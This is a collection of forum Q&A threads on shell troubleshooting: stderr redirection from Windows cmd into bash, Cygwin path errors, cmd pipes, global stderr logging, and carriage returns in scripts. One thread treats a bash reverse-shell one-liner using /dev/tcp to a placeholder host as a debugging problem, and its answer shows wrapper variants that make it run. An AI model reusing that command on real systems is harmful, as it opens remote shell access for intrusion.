I am running Windows 10 and am trying to save the error output of a test.sh file to a text file.
So I created the test.sh file and wrote an unknown command in it (i.e. "blablubb").
After that I open the terminal (cmd.exe), switch to the directory and type test.sh 2>> log.txt.
Another window opens with "/usr/bin/bash --login -i \test.sh" in the title bar, shows me "bash: blablubb: command not found" and then closes immediately.
I want to save that output because the bash window just opens for a split second. Every Google search brings me to websites talking about redirecting the output, saying that stream 2 is STDERR and that I should therefore use test.sh 2>> log.txt or something similar that takes care of the STDERR stream.
If I try the same with a test.sh file and the content:
#!/bin/bash
echo hi there
I get the output in the briefly open bash-window:
bash: #!/bin/bash: No such file or directory
hi there
But the log.txt file is empty.
If I only have echo hi there in the test.sh file I get bash: echo: command not found in the bash-window.
The log.txt is also empty.
If I type the following directly in the terminal, the output is written in the log.txt:
echo hi > log.txt 2>&1
If I type directly in the terminal:
echdo hi > log.txt 2>&1
I get 'Der Befehl "echdo" ist entweder falsch geschrieben oder konnte nicht gefunden werden.' (i.e. "The command "echdo" is either misspelled or could not be found.") in the log.txt file.
So I guess the redirecting of the output works fine until I use test.sh.
I know that .sh files are something from the Unix world and that the problem might lie there, but I don't know why I cannot redirect the output briefly shown in the bash console to a text file.
The 2>> redirection syntax only works if the command line containing that syntax is interpreted by bash. So it won't work from the Windows command prompt, even if the program you are running happens to be written in bash. By the time bash is running, it's too late; it gets the arguments as they were interpreted by CMD or whatever your Windows command interpreter is. (In this case, I'm guessing that means the shell script will find it has a command line argument [$1] with the value "2".)
If you open up a bash window (or just type bash in the command prompt window) and then type the test.sh 2>>log.txt command line in that shell, it will put the error message in the file as you expect.
I think you could also do it in one step by typing bash -c "test.sh 2>>log.txt" at the Windows command prompt, but I'm not sure; Windows quoting is different from *nix quoting, and that may wind up passing literal quotation marks to bash, which won't work.
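For example (a sketch; the ./ prefix is my addition, and the quoting details may need adjusting for your setup), either of these should get the error into the file:
bash                               # start bash first, so bash parses the redirection...
./test.sh 2>> log.txt              # ...the ./ may be needed, since . is usually not on bash's PATH
bash -c "./test.sh 2>>log.txt"     # or the one-step variant, subject to the quoting caveat above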
Note that CMD does have the 2>> syntax as well, and if you try to run a nonexistent windows command with 2>>errlog.txt, the "is not recognized" error message goes to the file. I think the problem comes from the fact that CMD and bash disagree on what "standard error" means, so redirecting the error output from Windows doesn't catch the error output by bash. But that's just speculation; I don't have a bash-on-Windows setup handy to test.
It would help to know whether you are running Windows Subsystem for Linux (Beta) or something else. I'm assuming that's what you are using on Windows 10.
If this is the case are you using bash to run the script?
Are you using win-bash?
If it is win-bash, I'm not very familiar with it and would recommend Windows Subsystem for Linux (Beta) for reasons like this. win-bash, while cool, might not be compatible with redirection operators like 2>>.
You have stdout and stderr; by default (if you don't specify a stream) >> (append) will only append standard output to the txt file.
If you use 2, it will append standard error to the txt file instead. Example: test.sh 2>> log.txt
This could be better described at this site.
To get exactly the command for appending both stdout and stderr, go to this page.
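In case that link changes, the usual idiom for appending both streams (a sketch, assuming the command line is parsed by bash rather than cmd) looks like this:
./test.sh >> log.txt 2>&1    # append stdout to log.txt, then send stderr to the same place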
Please tell me if this doesn't answer your question. Also, it could be more valuable to attempt a search for this answer first and explain why your search found nothing or give more extensive clarification as to what the problem is. I love answering questions and helping, but creating a new forum page for what might be an easy answer may be ineffective. I've had a bunch of fun with your question. I hope that I've helped.
That makes a lot of sense. Thanks Mark!
Taking what Mark says into account, I would get Windows Subsystem for Linux (Beta). There are instructions here. Then run your script from there.
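For example, once a WSL bash session is open, something along these lines should capture the errors (the directory is just a placeholder for wherever the script lives; Windows drives are mounted under /mnt):
cd /mnt/c/Users/you/scripts    # hypothetical path to the folder containing test.sh
bash test.sh 2>> log.txt       # bash parses the 2>> redirection this time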
Related
A formerly working bash script no longer works after switching computers. I get the following error:
No such file or directory.
Before going on, please excuse any mistakes you may find, since English is not my native language.
The script was used in Cygwin under Windows XP. I now had to switch to Cygwin64 under Windows 7 (64-bit).
The script is used as a checkhandler for the program SMSTools3 to split a file with a specific format into multiple smaller ones, which the program then uses to send SMS to multiple recipients. The script was copied directly from the page of SMSTools3 and uses the package formail.
After looking up the error, the most likely problem was that the environment PATH was not set up to look in the right place (/usr/bin). I therefore added it to the PATH, but to no avail.
I then deleted other entries in the Windows environment PATH which contained spaces, because that could have been another explanation, but again to no avail.
Following is a minimal example of the code which produces the error.
#!/bin/bash
# Sample script to allow multiple recipients in one message file.
# Define this script as a checkhandler.
echo $PATH
which formail
outgoing="/var/spool/sms/outgoing"
recipients=`formail -zx "To:" < "$1"`
I added the lines echo $PATH and which formail to show whether the script can find the correct file. Both results look fine; the second command gives me the right output '/usr/bin/formail'.
But the line recipients=... throws me the error:
No such file or directory.
I do not have much experience with bash scripting, or cygwin in general. So if someone on this wonderful board could help me solve this problem, I would be really grateful. Thank you all for your help.
EDIT:
First of all thank you all for your comments.
Secondly, I would like to apologize for the late reply. The computer in question is also used for other purposes and my problem is part of a background routine, so I have to wait for "free time" on the pc to test things.
For the things @shellter proposed: the ls command returned an error: '': No such file or directory.
The which -a formail as well as the echo $(which -a formail) commands that @DougHenderson proposed returned the 'right' path of /usr/bin/formail. echo \$1 = $1 before the recipients line returned the path to the checkhandler file (/usr/local/bin/smsd_checkhandler.sh); the same command after the recipients line seems to show an empty string ($1 = ). Also, the proposed change to the recipients line did not change the error.
For the dos2unix conversion that @DennisWilliamson proposed, I opened the file in Notepad++ to use its built-in conversion, but it showed me that the file is already in Unix format with Unix-style line endings.
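For anyone trying to reproduce these checks, a minimal way to trace the checkhandler by hand (the test file path is just a placeholder; -x makes bash print each command before running it) would be something like:
bash -x /usr/local/bin/smsd_checkhandler.sh /path/to/some_test_message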
I am running the following command from Maple (the system function works just like functions such as os.system in Python):
system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1")
However, it fails and this is the output:
bash: no job control in this shell
bash: &: No such file or directory
Exit Value: 127
The weird thing is that the command works great when calling it from Terminal...
Any suggestions of how I could fix this?
"No job control" means that you can't bring background jobs into the foreground when running an interactive shell.
I would focus the analysis on the wording of the second error message. We know from it that bash is running. My guess is that Maple (not knowing the meaning of the > WORD construct in bash) tokenizes the string along the white space, and then does something like execv("bash", "bash", "-i>0", "/dev/tcp/myownip/myport"). At least this would explain the error message.
Could you try the following? Create a stand-alone two-line bash script like this:
#!/usr/bin/bash
bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1
Set it to executable, and then invoke it from Maple with
system("yourpath/yourscript")
At least the error message No such file or directory should be gone.
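Another thing that might work, in the same spirit, is handing the whole command line to bash as a single string so that bash, not Maple, parses the redirections (untested from Maple, so treat it as a sketch):
system("bash -c 'bash -i >& /dev/tcp/myownip/myport 0>&1 2>&1'")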
Which command in a Windows command script (.cmd) accepts a pipe (so no "The Process tried to write to a nonexistent pipe." error is generated), but generates no output itself, including output to StdErr? I need to leave the normal StdErr output untouched (keep in mind, the pipe transports only StdOut). I can't use the null device, because it's not installed on the system.
For example, command|rem generates the mentioned error. But I want no error output except that generated by command, so rem is not a suitable command for this purpose.
The main aim is script speed, so please don't offer elaborate constructions.
It should be break (or set /p= ?), as it is an internal command prompt command (i.e. no external process is started) and it generally does nothing. Though I suppose if you are searching for an executable packaged with Windows, the answer will be different.
The cd . command is what you are looking for. I used it to create empty files. This way, command | cd . works, and echo Hello >&2 | cd . shows "Hello" on the screen! It works as a filter that just swallows StdOut (interesting).
There are plenty of threads here discussing how to do this for scripts or for the cmdline (mostly involving pipes, redirections, tee).
What I didn't find is a solution which can be set up once and then just works globally, without manipulating single scripts or adding something to every command line.
What I want to achieve is something like described in the top answer of
How do I write stderr to a file while using "tee" with a pipe?
Isn't it possible to configure the bash session so that all stderr output is logged to a file, while still writing it to console? Something I could add to .bashrc and thus automatically set up every time I login?
Software: Bash 4.2.24(1)-release (x86_64-pc-linux-gnu), xterm, Ubuntu 12.04
Try this variation on @0xC0000022L's previous solution (put it in your .bash_profile):
exec 2> >( tee log.file > /dev/tty )
A couple of caveats:
The prompt and anything you type at the command line are printed to stderr, and so will be logged in your file.
There could be an issue with the newline that terminates a command not being displayed in your terminal; I observe it on my Linux host, but not on my Mac OS X laptop. Perhaps someone else can explain and/or fix the issue. For example, if I type "echo stdout", I see the following:
$ echo stdoutstdout
$
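If you want to verify that the redirection is active after sourcing the file, something like this should do (log.file is whatever name you used in the exec line; the path is just any path that doesn't exist):
ls /no/such/path    # the error message still appears on the terminal
cat log.file        # and the same message should now also be in the log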
I'm trying to write a script that contains this
screen -S demo -d -m
which should start a new screen session named demo and detach it.
Putting screen -S demo -d -m in the command line works.
If I put it in a file named boot.sh and run it with ./boot.sh, I get
Error: Unknown option m
Why does this work in the command line but not as a shell script?
This file was transferred from Windows and had Ctrl-M (carriage return) characters.
Running "screen" on my Linux machine, a bad option (Screen version 4.00.03jw4 (FAU) 2-May-06) gives the error,
Error: Unknown option -z
while your description includes no dash before the offending option. I'd check that the characters in your script file are what you expect them to be. There are many characters that look like a dash but which are not.
cat -v boot.sh
may show something interesting, as it'll show codes for non-ASCII characters.
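If the file really did come from Windows, cat -v will show the stray carriage returns as ^M at the end of each line. A couple of common ways to strip them (assuming dos2unix or GNU sed is installed) are:
dos2unix boot.sh            # rewrite the file with Unix line endings
sed -i 's/\r$//' boot.sh    # same idea using GNU sed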
This may seem a little like the "make sure your printer is plugged in" kind of help, but anyway:
have you tried to check whether the screen you're invoking from the script is the same as the one invoked from the command line?
I'm thinking you may be changing the PATH variable inside your script somewhere, and perhaps the screen found by the script is something else (a different version, perhaps?).
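One quick way to compare (a sketch; run it both from an interactive shell and from inside the script) is:
type -a screen    # lists every screen executable found via the current PATH
screen -v         # prints the version, so the two environments can be compared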